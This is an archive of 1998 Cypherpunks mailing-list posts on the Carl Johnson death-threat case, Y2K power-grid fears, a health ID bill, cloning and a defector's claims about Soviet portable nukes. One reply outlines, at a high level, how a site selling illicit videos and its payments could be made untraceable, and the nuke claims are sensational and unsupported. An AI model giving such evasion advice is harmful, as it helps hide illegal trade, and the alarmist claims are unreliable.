 Regardless of the form, he said, the driving force is
 angst about today's rapid social change - change as
 momentous as that experienced during the Industrial
 Revolution.

 "What a lot of millennial groups are trying to do is
 hold onto the past," Dr. Lamy said. "They are
 merely saying that they're afraid."

 Of course, fear is not an unreasonable response.

 "This is not a false issue," said Bill Wachel, a
 computer consultant who founded DFW Prep 2000,
 a forum in which industry representatives share
 information on the issue.

 "It's possible, yeah, that the whole world could
 come apart. Is it probable? No."

 Dr. Leon Kappelman of the University of North
 Texas is leading the charge for government to
 pressure crucial industries such as electric utilities,
 telecommunications and medicine to fix Y2K
 problems. He isn't anticipating doom, but he doubts
 that many Americans will escape unscathed.

 "I don't really know what the future is. I know there
 are serious risks," he said. "I expect life to be a little
 more difficult for awhile."

 He has no use for those who choose to flee.

 "Cowards would be a good word [for them]," he
 said. "Deserters."

 Dr. Landes, too, urges Americans to hang together
 rather than hang separately.

 "Y2K can be a gift," he said. "It's a test. How do we
 as a culture handle this - not only the problem, but
 the rhetoric surrounding the problem?"

 As Mr. Elder explored the cave he had chosen to
 demonstrate to a visitor the wisdom of his plan, he
 came upon artifacts of a earlier era's doomsday
 fears. Next to a sign designating the cavern as an
 official fallout shelter lay tins of 1950s-vintage
 survival rations.

 The tins were unopened and pocked with rust.

 (c) 1998 The Dallas Morning News
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Sep 1998 10:31:01 +0800
To: cypherpunks@cyberpass.net
Subject: [FP] FW: Bill to Limit Nat'l ID Plan
Message-ID: <199809090224.TAA18290@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: [FP] FW: Bill to Limit Nat'l ID Plan
Date: Fri, 4 Sep 1998 22:09:53 -0500
To: "Scan This News Recipients List" <scan@efga.org>


[Forwarded message from:]
believer@telepath.com [mailto:believer@telepath.com]
Sent: Monday, May 05, 1997 3:12 PM
To: believer@telepath.com
Subject: Bill to Limit Nat'l ID Plan

---------------------------
NOTE TO LISTEES:  Remember:  LIMITING is NOT what we want.  Limiting will
only detail the terms and conditions under which a National ID *W*I*L*L* be
required.  We want no ID at all.  Let's make this clear to legislators.
They still don't get it.
---------------------------

Source:  Washington Post
http://search.washingtonpost.com/wp-srv/WAPO/19980904/V000365-090498-idx.htm
l

Senate Mulls Healthcare ID Proposal

By Cassandra Burrell
Associated Press Writer
Friday, September 4, 1998; 1:39 a.m. EDT

WASHINGTON (AP) -- A plan to assign every American a lifetime
health-care ID number, similar to a Social Security number, could face
new limits under a measure headed for Senate debate.

A provision introduced Thursday by Sen. Kay Bailey Hutchison,
R-Texas, would prohibit the Health and Human Services Department
from going forward with the plan until Congress approves its specifics.

Critics say the system, being developed as part of the 1996 Health
Insurance Portability and Accountability Act, could invade privacy by
opening medical histories to insurers, employers and others. The law
guarantees that anyone changing or losing a job would be able to get
health insurance, even with a pre-existing medical condition.

``The plan, as HHS intended to carry it forward, raises questions of
excessive government involvement and control -- not to mention privacy,''
Hutchison said.

The Senate Appropriations Committee added Hutchison's amendment to
an $82 billion spending bill funding the Labor, Education and Health and
Human Services departments as well as several related agencies for the
fiscal year that begins Oct. 1.

The committee approved the overall bill with little debate and sent it to
the
Senate. But some members said they planned to introduce more
controversial issues into the bill during floor debate, including provisions
dealing with federal funding of single-sex classrooms and allowing
Medicare recipients to go outside the program for care not covered by the
plan.

President Clinton has threatened to veto a matching bill in the House
because it lacks money for some of his favorite programs, such as summer
jobs for poor youth and low-income heating assistance.

Also Thursday, the Senate resolved a dispute over staffing at the Federal
Election Commission, clearing the way for passage of a $29.9 billion
spending bill funding the Treasury Department and related agencies.

The Treasury bill was pulled from the Senate floor in late July because of
Democratic objections to a Republican amendment that would have made
it easier to remove the FEC's staff director and general counsel. With
resolution of the issue, the bill passed 91-5 Thursday without further
debate.

Introduced by Sen. Mitch McConnell, R-Ky., the disputed amendment
sought to limit to four years the currently open-ended terms of the two
officials and to require approval of four of the FEC's six commissioners
before the terms could be extended.

Each party selects three commissioners. Democrats, led by Sen. Carl
Levin of Michigan, contended the amendment would let one party remove
an official for no reason and undermine the agency's independence.

Under a compromise worked out with Levin, the current general counsel
and staff director would not have term limits, future service would be set
at six years with votes of only three commissioners required to approve an
extension.

The $27 billion House bill, which passed in July, does not include language
on the FEC staffers. Differences will have to be worked out in a
House-Senate conference.

The Senate bill, which would increase money for drug enforcement, gang
resistance and customer service by the Internal Revenue Service,
establishes spending at $7.85 billion for the IRS, $1.7 billion for the U.S.
Customs Service and $593 million for the Secret Service.

Like the House bill, it would freeze salaries for members of Congress but
would allow 3.6 percent cost-of-living raises for other federal workers.

It also was amended to require federal employee health plans that cover
prescription drugs to provide coverage for contraceptives.

 (c) Copyright 1998 The Associated Press

-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 9 Sep 1998 10:38:59 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Carl Johnson Warrant and Complaint
In-Reply-To: <199809082346.TAA31245@camel8.mindspring.com>
Message-ID: <v03130302b21b96053fd9@[209.66.100.149]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:40 PM -0700 9/8/98, Eric Cordian wrote:
> I'm amazed Arjen
>Lenstra isn't in the slammer for the "DigiCrime" parody, given the
>"knowlege and experience" of Mr. Investigator here.
>

I'm sometimes surprised I was never arrested for pulling off the "BlackNet"
secrets trading scheme. (Especially as it actually worked as I described
it....and to think some of the folks here think I've never built anything.)

As for the Carl Johnson document that John Young offers, I read it with
great interest, much more interest than I ever could muster for the rants
of Toto/Human Gus-Peter/Truthmonger.

As I'd been deleting nearly all of Toto's stuff unread, I missed all the
stuff about (allegedly) threatening to bomb the RCMP. I recall seeing his
"AP Bot" and "Dead Lucky" items, which came out before I was deleting all
of his stuff.

I suppose I agree with Eric's earlier point (snipped above) that mentioning
the actual names of judges or FBI agents or IRS inspectors in rants about
AP and AP bots is not a wise move. As with Bell's stuff, it makes for a
case that _possibly_ these agents and judges had something to fear. Were I
one of those judges or agents, I would tend to think that _possibly_ my
life was in danger.

Best to leave rants at the general, protected speech level, and to not get
into specifics of names and working habits of agents.

(I make it a point not to bother learning the names of any of these folks,
except high-visibility folks like Diane Feinswine, Janet Reno, Louis Freeh,
etc. This makes it hard for any of my generalized rants to be taken as
direct threats against local judges, agents, lawyers, etc.)

And if Toto or Carl Johnson did in fact plant a bomb....I guess he'll be
extradited to Canada after his trial here in the U.S. for the charges
described. And he may well get off on the U.S. charges, as it seems likely
that experts (like us, ironically) can testify that whatever point Toto
thought he was making, there was no chance that a working "dead pool" was
being demonstrated.

But Toto will probably make a plea, as Bell did.

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 9 Sep 1998 08:02:45 +0800
To: cypherpunks@toad.com
Subject: Carl Johnson Warrant and Complaint
Message-ID: <199809082346.TAA31245@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks to anonymous we offer the arrest warrant and
complaint against Carl Edward Johnson:

   http://jya.com/usa-v-cej-wc.htm  (23K)

List Cypherpunks is spotlighted by the IRS complainant,
Jeff Gordon, who made Jim Bell famous. The list is 
quoted, logged, tracked, and cited for its hosting alleged death 
threat messages against federal officials, which were
PGP-authenticated and -decoded, and their style and content 
assessed for identity of the author, along with other allegations 
by the RCMP on what Carl may or may not have done up north 
and by the Secret Service on Carl may or may not have said 
out west.

We have also been told that Carl is known as "The King
of Country Porn" among admiring fans of his music.

Whether this has anything to do with the little-known person 
we're seeking information about is a mystery.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Sep 1998 08:40:57 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: usa-v-cej-wc.htm (fwd)
Message-ID: <199809090053.TAA12423@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Notice: mucho text deleted.

Forwarded message:

> X-within-URL: http://jya.com/usa-v-cej-wc.htm

>    criminal threats to kill, injure, obstruct, impede, threaten and
>    intimidate IRS

>    and other Government employees. I have also conducted numerous
>    investigations involving the use of computers and the Internet. Since

>    Western District of Washington. In the investigation of Mr. Bell, it
>    was discovered that he had posted a plan (titled "Assassination
>    Politics") on the Internet, offering users of the Internet a method
>    for anonymously funding the assassinations of IRS and other Government

>    Internet group known as the "Cypherpunks." During the investigation of

This guy has experience with the Internet and doesn't know the difference
between a group and a mailing list, what a maroon.

>    Bell I noted that Bell exchanged both private and public e-mail
>    messages with an unidentified person using the name "Toto."

Implying Bell was under surveillance.

>    residence. Shortly thereafter, a member of the Cypherpunks group
>    stated via the Internet that he had obtained a copy of the warrant and
>    return, and publicly posted them on the Internet.

And the point is?

>    Bell was arrested and charged with Corruptly Obstructing and Impeding

So I can non-corruptly obstruct and impede?

>    4. On June 23, 1997, an anonymous message was posted to the
>    Cypherpunks Internet mailing list. [A "mailing list" consists of the

Well, finaly got the terms right.

>    5. Based on my training and experience, I know that "Bot" is a slang
>    term for an automated computer program. I also know that "e$" and
>    "eCa$h" are slang terms for electronic or digital cash, which was a
...
>    maker or indorser [as written]. [By analogy, digital cash is like a
>    digital "poker chip" issued by a particular casino.]

Oh well, I knew he couldn't keep it straight.

>    6. On September 4, 1997, a second message involving "Dead Lucky" was
>    anonymously posted to the Cypherpunks group. This message stated in

This guy keeps using 'group' instead of 'mailing list', there is the
potential implication of conspiracy here...I wouldn't be surprised if just
about all of us weren't under surveillance at this point.

>    8. On December 9, 1997, an anonymous message was posted to the
>    Cypherpunks Internet mail group with the subject listed as "Encrypted
>    InterNet DEATH THREAT!!! / ATTN: Ninth District Judges / PASSWORD:
>    sog"[.] The body of the message was encrypted with the publicly
>    available encryption software PGP, and was initially unreadable. Using
>    PGP software and the password shown in the subject line of the
>    message, I was able to decrypt the message, which contained a
>    rambling, five-page statement, including the following:

>      I can also be tied into Jim Bell's Worldwide Conspiracy to
>      assassinate government authorities, through my implementation of an
>      Assassination Bot ..."

See I told you there was a conspiracy buried in there somewhere!

>    9. I noted that this message contained a PGP digital signature. From
>    my training and experience, I am aware that this digital signature is
>    used as a way to authenticate digital documents to make sure that they
>    are authored by the purported author and that no one has tampered with
>    them. When I checked the signature using only PGP software, the PGP
>    program was unable to identify it.

>    Only July 1, 1998, Royal Canadian
>    Mounted Police (RCMP) Investigator Steve Foster provided me with a PGP
>    "Secret Key Ring" which he stated he had obtained from a computer
>    which Canadian Customs authorities had seized from an individual by
>    the name of CARL EDWARD JOHNSON. [A "secret key ring" is a
>    user-generated code which allows for the encryption (and later
>    authentication) of computer-generated documents.] When I checked the
>    digital signature on the Internet death threat using the PGP software
>    and JOHNSON'S secret key ring, the computer identified the signature
>    as one of the signature keys stored in JOHNSON'S computer. Because
>    both the "private" and "public" portions of the "key" were stored on
>    JOHNSON'S computer, the message can be authenticated as having been
>    generated by the person who possessed this "secret key" and knew the
>    correct password. In other words, only the person possessing the
>    secret key found on JOHNSON'S computer could have generated the "death
>    threat" message.

>    10. I have also spoken by phone with Special Agent Jeremy Sheridan of
>    the United States Secret Service. Sheridan told me that on July 31,
>    1998, he located and interviewed Carl JOHNSON at 1800 West Magee, in
>    Tucson, Arizona. The address belongs to a Linda Reed, who, according
>    to Canadian police authorities, is a friend of JOHNSON'S. During this
>    interview JOHNSON admitted that he often wrote on the Internet and
>    among the names he used were Toto, C.J. Parker, and TruthMonger.
>    Johnson also stated that he had been using the Internet account of
>    Linda Reed. Sheridan showed JOHNSON a decrypted copy of the December
>    9, 1997 Internet message entitled "Encrypted InterNet DEATH THREAT!!!
>    / ATTN: Ninth district Court Judges / PASSWORD: sog." JOHNSON
>    acknowledge that he wrote it. JOHNSON also stated that he had
>    significant psychological problems.

Probably not a wise move, don't know about psychological problems but it
certainly demonstrates a lack of intelligence.

>    bomb that was discovered in the basement of the Estevan courthouse on
>    June 3, 1998. Block advised me that Carl JOHNSON has been formally
>    charged with placing the bomb and that a warrant for his arrest has
>    been issued in Canada. Block advised me that he believes that JOHNSON
>    fled to the United States after placing the bomb in the Estevan
>    courthouse.

That's impressive if true.

>    15. On June 10, 1998, an anonymous message was posted to the
>    Cypherpunks Internet group. In the message, it is stated that the
>    bomber "placed the bomb before embarking on a middle-leg of the

So that's why he came to Austin?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Sep 1998 12:54:57 +0800
To: cypherpunks@cyberpass.net
Subject: SCADA in power grid
Message-ID: <199809090318.UAA21915@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain





this is from http://www.garynorth.com/y2k/detail_.cfm/2439


                     Gary North's Y2K Links and Forums

                            Summary and Comments

                       (feel free to mail this page)
      ----------------------------------------------------------------
       Category:  Power_Grid

           Date:  1998-08-29 13:57:30

        Subject:  The Convenient Lie:

            Link: http://y2ktimebomb.com/PP/RC/dm9834.htm

        Comment:  On August 27, I spoke before a meeting of 500
                  people -- 5% of a local town. At that meeting,
                  representatives of several industries spoke:
                  banking, telephone, electrical power.

                  When pressed by someone in the audience, the
                  representative of the power company insisted they
                  could run the entire company on manual systems
                  without compliant computers. Forget about
                  noncompliant chips. The company can do it manually.

                  I asked him straight: Can they run the SCADA
                  (supervisory control and data acquisition) system
                  without telecommunications? That's the computerized
                  system that tells them how much power is running
                  through the lines. "Yes," he said.

                  A week before I had been told by an engineer with a
                  large urban power company that without SCADA, they
                  would fry the lines permanently. "There is no way
                  we could run the system manually."

                  I guess engineers don't agree.

                  I told the audience this:

                  "No system can be switched to pre-computer manual
                  operations without training. Any outfit that claims
                  that it can be run manually had better have a
                  highly trained technical staff to take over in
                  2000. Does the outfit have a training manual? How
                  much training money has it budgeted?"

                  Any outfit that does not have the staff being
                  trained right now is lying when it says that it can
                  be run manually. It cannot be run manually by
                  phantom workers. The men who knew how to run it
                  manually were fired 30 years ago. The manual
                  systems were replaced. The industry did not spend
                  hundreds of billions of dollars on computerization
                  so as to have two separate operation systems. They
                  spent the money to get rid of manual systems.

                  Any time you hear some representative tell you his
                  public utility can be run manually, ask five
                  questions:

                  1. How many trained personnel do you need,
                  including substitutes, to run your system manually?

                  2. How many are currently undergoing training for
                  this task, and how many have finished it?

                  3. May I come in and see your training manual that
                  you use to train these people?

                  4. How much money has your company budgeted to
                  train this staff?

                  5. How much has already been spent?

                  You must call their bluff. They're lying. They have
                  no intention of trying to run anything manually.
                  It's just a PR ploy. It's Monica Lewinsky syndrome.
                  Nobody suffers any consequences for lying to the
                  public.

                  But can't they be sued for lying, i.e., misleading
                  the public? Not if all companies in the industry
                  collapse for the same reason. They will share the
                  blame, or pass it on to a higher authority: "An act
                  of God."

                  When you catch one of them in a lie this big, you
                  can rest assured: he knows that it can't be fixed
                  by anyone, so he knows he can't be successfully
                  sued.

                  Training to convert to manual systems won't work,
                  of course. The power industry can't be run
                  manually, and it's too late to fix the code.
                  Besides, nobody in the industry will pay any
                  attention to such warnings. But at least it lets
                  the industry know that you don't believe the lie
                  any more.

                  Dick Mills, who is a public optimist about the
                  power grid, recently issued a warning to the
                  industry: begin contingency planning. This includes
                  training. This is the best advice that anyone could
                  give the power industry -- not because the advice
                  could work at this late date, but because it's time
                  to call their bluff.

                  This is from Westergaard's site.

                  * * * * * * * * *

                  . . . Isn't there already a national emergency plan
                  in place for such as critical infrastructure such
                  as power? No, not to my knowledge. Please write and
                  tell me if I'm wrong.

                  Never before, has there been a threat to the power
                  system of such sweeping scope and magnitude as Y2K.
                  There was no need for a national electric-power
                  emergency plan. Prudence requires that we have such
                  a plan, not only for Y2K but also for other future
                  threats.

                  I foresee that this plan will need to span
                  national, state, local, public, private, utility
                  and non-utility boundaries. How might we accomplish
                  that? I've been told that existing presidential
                  executive orders allow the entire industry to be
                  nationalized at the stroke of a pen in case of
                  emergency. Thus the authority exists, but it will
                  do no good unless there are plans and trained
                  organizations in place to use it effectively.

                  There are numerous mitigating possibilities to be
                  considered. That is true of not only to electric
                  power but also to all industries and all facets of
                  the Y2K problem. . . .

                  It is already too late to finish Y2K remediation
                  for many companies, but it is not too late for
                  disaster preparations. To actually get practical
                  and practiced disaster preparedness plans in place,
                  we must accomplish three things. I see these three
                  as my working goals. I hope you do the same. . . .

                  We must plan, train, and practice the
                  implementation of emergency procedures. Those are
                  key elements of all emergency services like fire
                  and police. In the Y2K case, we have to combine
                  strangers into teams, invent new roles, and
                  practice. That takes time.

           Link:  http://y2ktimebomb.com/PP/RC/dm9834.htm

      ----------------------------------------------------------------
                       Return to Category: Power_Grid

                         Return to Main Categories

                            Return to Home Page




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: techsales@oreilly.com
Date: Wed, 9 Sep 1998 11:41:39 +0800
To: cypherpunks@toad.com
Subject: WebSite Professional 2.3
Message-ID: <199809090329.UAA23899@rock.west.ora.com>
MIME-Version: 1.0
Content-Type: text/plain




Hello!

Thank you for downloading O'Reilly's WebSite Professional 2.3.

There's a ton of great stuff wrapped up in that one package, 
so I hope you'll invest a little time to play with it thoroughly.
I'm confident you'll consider it time well spent. 

In fact, before long, you may just find yourself among WebSite's 
growing ranks of raving fans. Just like these corporations and
institutions:

AT&T			National Cancer Institute
Bear Stearns		Siemens Nixdorf
Boeing North America	Smithsonian Institution
County of Los Angeles	Snap-on Tools, Inc.
Hewlett-Packard		Sprint
Indiana University	Union Pacific Railroad
Intel			United States Geological Survey
JCPenny			University of Miami
Lucent Technologies	Warner Brothers
Motorola		Yamaha Corporation

If, during your trial of WebSite Pro, you have any questions
about its capabilities or functionality, please contact me
directly at techsales@oreilly.com or call 1-800-998-9938 
(707-829-0515) ext. 351.  

To download other WebSite Professional 2.3 components you
can go to: http://software.oreilly.com/download/wsp23demo_download.html

To access our Knowledge Base:
http://software.oreilly.com/techsupport/index_ws.html


Thanks again, and have a great day!

--
Michelle Koff, techsales@oreilly.com
Technical Sales Associate
O'Reilly & Associates (http://software.oreilly.com)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Wed, 9 Sep 1998 09:47:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Carl Johnson Warrant and Complaint
In-Reply-To: <199809082346.TAA31245@camel8.mindspring.com>
Message-ID: <199809090140.UAA29195@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain




> Thanks to anonymous we offer the arrest warrant and
> complaint against Carl Edward Johnson:

I conclude:

A. There actually exist federal investigators who have nothing
   better to do with their lives than read the complete writings
   of the Performance Artists Sometimes Known as "Toto," and
   engage in endless mental masturbation over the hidden messages
   they imagine to be contained therein. 

B. When writing parody on the subject of AP, it is best not to 
   employ the names of actual federal slackers, lest the clueless
   investigators actually believe them to be targeted in some fashion. 

The part where he explains digital cash and how he clicked on the AP
Web Form almost rises to the AOL level of stupidity.  I'm amazed Arjen
Lenstra isn't in the slammer for the "DigiCrime" parody, given the
"knowlege and experience" of Mr. Investigator here. 

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Sep 1998 09:45:09 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Movie/Research Research (fwd)
Message-ID: <199809090201.VAA12886@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: WGKOPP@aol.com
> Date: Tue, 8 Sep 1998 21:33:54 EDT
> Subject: Movie/Research Research

> The "villians" are charging people $15 (from their credit card - or another
> source) to download or "watch"  a video clip of highly illicit material, from
> a specific website.
> Our "protagonist" has to stop these "video's" and the people behind them, but,
> they cannot seem to trace them, or where the funds are going. 
> 
> How can this be done? How can we realistically make it so that origins and/or
> location & authors of the website are untraceable. Also, that the funds are
> untraceable.

You'd need to use something like an eternity server or a data haven. These
allow one to obtain information from an unknown 3rd party based on a
distributed network of servers and search engines.

All transactions of e$ would need to go through an anonymous remailer of
some sort that interfaced to a suitable bank handlding EFT's via the
Internet.

The web surfing could be implimented via a CROWDS style mechanism.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tim May)
Date: Wed, 9 Sep 1998 13:05:14 +0800
To: cypherpunks@cyberpass.net
Subject: Re: RUSSIAN DEFECTOR WARNS OF PRE-POSITIONED PORTABLE NUKES
In-Reply-To: <199809082136.VAA01195@earth.wazoo.com>
Message-ID: <199809090406.VAA31614@always.got.net>
MIME-Version: 1.0
Content-Type: text/plain




An interesting report from a GRU defector. How much of it is true? How
much is rehashed?

In any case, somebody must have cursed us, because we truly do live in
interesting times. Y2K, terrorism, busts of cypherpunks, martial law
contingency plans, a meltdown of Asian and Russian economies (with Latin
America apparently headed down the same drain), Asama bin Laden, VX nerve
gas, Ebola being developed in weapons labs, and on and on.

I'm glad I live far away from safe targets and have accumulated enough
supplies to "hunker" down for a long time.

There are two articles here, both interesting.

--Tim May


In article <199809082136.VAA01195@earth.wazoo.com>, Anonymous
<nobody@earth.wazoo.com> wrote:

> Colonel Stanislav Lunev, Russian GRU defector talks about the BACKPACK NUKES
> on KSFO, Geoff Metcalf Show
> 
> KSFO 560 AM San Francisco, Geoff Metcalf Show
> 
> GUEST:Colonel Stanislav Lunev, Russian GRU defector, author of "Through the
> Eyes of the Enemy"
> 
> SUMMARY OF LUNEV'S REMARKS
> 
> Boris Yelstin is a mafia tool, an alcoholic who has not at all decreased his
> habit of drinking who "cannot appear more than one hour in public or he
> looses control over himself". He is a "decoration of power" controlled by
> criminals and industrial tycoons who rule Russia behind the scenes.
> 
> "Russia as Friend" is a theme slavishly pursued by breathless Western-types,
> but in fact is an illusion. Only 2 months ago a large secret Soviet Air Base
> conducted a very large-scale simulation of all-out nuclear with the West. A
> similar exercise undertaken by Soviet Northern Fleet only 2 weeks ago.
> 
> In case of outbreak of war (something that Lunev sees as a greater danger
> NOW than at any time in the past), portable containers of chemical,
> biological, and nuclear for use by Spetnaz against command and control
> centers, water and air supplies, and specific individuals in a "decapitory
> strike"-type scenario.
> 
> Prior to hostilities, "students and businessmen" infiltrate into the US
> using regular airlines, discard their disguises, and proceed to weapon
> storage sites and then onto final targets.
> 
> 100 of these weapons are stored outside the former Soviet Union.
> 
> 57 main cells of industrial techno-snooping exist around the San Francisco
> Bay Area.
> 
> In February '97, Boris Yelstin gave a special order to Russian intelligence
> to dramatically increase industrial espionage against the USA. Lunev
> estimates that just in the last several years, espionage within America has
> roughly doubled.
> 
> Lunev indicates that China and Russia have entered into substantial, formal
> cooperation in their espionage efforts against the USA. He adds that in the
> outbreak of war, both countries could fight together against America.
> 
> Metcalf closes by saying that Lunev's book can be ordered by calling
> 1-888-606-0614.
> 
> ----------------------------------------------------------------------------
> [www.FreeRepublic.com]
> 
> ----------------------------------------------------------------------
> USG Ignores Soviet Special Troops Inside Our Borders
> by Neil C. Livingston and M. K. Pilgrim
> 
> The following scenario outlining typical Spetsnaz-type operations
> prior to a Soviet main-force incursion into a foreign country comes
> from unclassified U.S. government documents.
> 
> "An unconventional warefare scenario: The following hypothetical
> scenario illustrates the employment concept for the full exploitation
> of Soviet UW [unconventional warefare] assets.
> 
> "In support of a coordinated attack, air-dropped or air-landed GRU
> special purpose teams would be introduced into their respective target
> areas some days prior to H-hour. Special KGB sabotage teams would have
> been infiltrated over a longer period of time by clandestine methods
> to include the use of international commercial travel. These sabotage
> teams could be prepared to begin their operations well before the
> enemy's rear area security apparatus can be fully alerted. In the
> pre-war period, some KGB personnel will seek to undermine national
> resistance through political measures.
> 
> "Sabotage teams will begin isolated acts of sabotage such as
> destroying a key bridge. In addition, KGB teams will attempt to create
> chaos at major ports and distrupt communications.
> 
> "Shortly before D-day, additional sabotage teams will be inserted and
> the majority of `sleeper agents' activated.
> 
> "Sabotage equipment can be smuggled into a country by any number of
> secret methods and stored in hidden, but easily accessible, caches.
> Smuggling techniques may include the offshore dropping of waterproof
> containers from ships and submarines. In accordance with the
> prearranged signals, they will be recovered and stored by clandestine
> support personnel.
> 
> "Sensitive or fragil equipment (electronics material, detonators, and
> communication devices) can be brought into the country by diplomatic
> pouch and made available to the teams through established procedures.
> 
> "Teams will attempt tp place their explosives and incendiary devices
> on the targets and set them to detonate at H-hour. All efforts will be
> made to prevent association of these acts with the USSR in order to
> maintain the element of surprise for the main attack. Immediately
> prior to H-hour, the UW teams will prepare to:
>   * Locate and destroy nuclear capable weaponry.
>   * Jam radar installations.
>   * Kidnap or assassinate key political-military leadership.
>   * Seize or destroy radio and TV broadcasting facilities.
> 
> "At H-hour a wide spectrum of sabotage actions will be initiated."
> 
> 
> http://www.icom.net/~tachyon/military/spetsnaz.html
> Soldier of Fortune
> January 1988
> 
> SOF SOVIET SPECIAL OPS
> SPETSNAZ INVADES AMERICA
> USG Ignores Soviet Special Troops Inside Our Borders




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 9 Sep 1998 13:07:28 +0800
To: cypherpunks@cyberpass.net
Subject: If there's a trial will some of us be witnesses?
Message-ID: <v03130304b21bb25ce70a@[209.66.100.149]>
MIME-Version: 1.0
Content-Type: text/plain




If Carl Johnson comes to trial, presumably both sides will call expert
witnesses.

So, who will these witnesses be? Ironically, we are almost certainly the
most qualified witnesses on the planet in these issues.

However, I expect we are too disreputable, to either side, to be called.
Instead, they'll likely call on peripheral players like Dorothy Denning to
explain to the jury what AP is. Or perhaps the "Science Applications Inc."
lightweight who attempted to analyze anonymity and remailers for a
conference paper a year or two ago.

Food for thought.

I'm not sure how I'd react if either side called on me to act as witness.
And if they subpoenaed me, I suppose I'd have to spend a few kilobucks to
hire some lawyer to explain to me how and when I could take the Fifth.
(That's what it's come to, with lawyers needed at every stage.)

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Tue, 8 Sep 1998 19:29:01 +0800
To: cypherpunks@cyberpass.net
Subject: Seed to clone himself, one way or another [CNN]
Message-ID: <3.0.3.32.19980908212730.0069b90c@apf2.com>
MIME-Version: 1.0
Content-Type: text/plain



>From: Jim Choate <ravage@EINSTEIN.ssz.com>
>
>Hi,
>
>It seems that scientist in general may soon be forced to roam from country
>to country to practice their work.
>
>Shades of Neuromancer. I am more and more convinced that Gibson's book, and
>it's social commentary, is right on the mark.
>
>Forwarded message:
>
>> X-within-URL: http://www.cnn.com/TECH/science/9809/07/clone.seed.ap/
>
>>           CHICAGO PHYSICIST SAYS HE'LL CLONE HIMSELF WITH WIFE'S HELP
>>                                        
>>    Dr. Richard Seed Richard Seed   September 7, 1998
>>    Web posted at: 3:50 a.m. EDT (0750 GMT)
>>    
>>    BOSTON (AP) -- A physicist with three Harvard degrees but no medical
>>    license said he is ready to begin the first step toward immortality:
>>    he will clone himself.
>
>[text deleted]
>
>>    Seed has said that if Congress bans cloning, he will move his
>>    operation to Tijuana, Mexico.
>

But if the feds pull similar bullshit as with crypto work he'll have to
give up US citizenship to do the work. The regs for crypto appear to make
it such that even if I live permanently outside the US I can not work on or
produce crypto related products even if they are based on non-US
technologies. It seems that being a citizen of the US is less and less
attractive every day...

Albert P. Franco, II




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WGKOPP@aol.com
Date: Wed, 9 Sep 1998 09:39:15 +0800
To: cypherpunks@Algebra.COM
Subject: Movie/Research Research
Message-ID: <22a37099.35f5db02@aol.com>
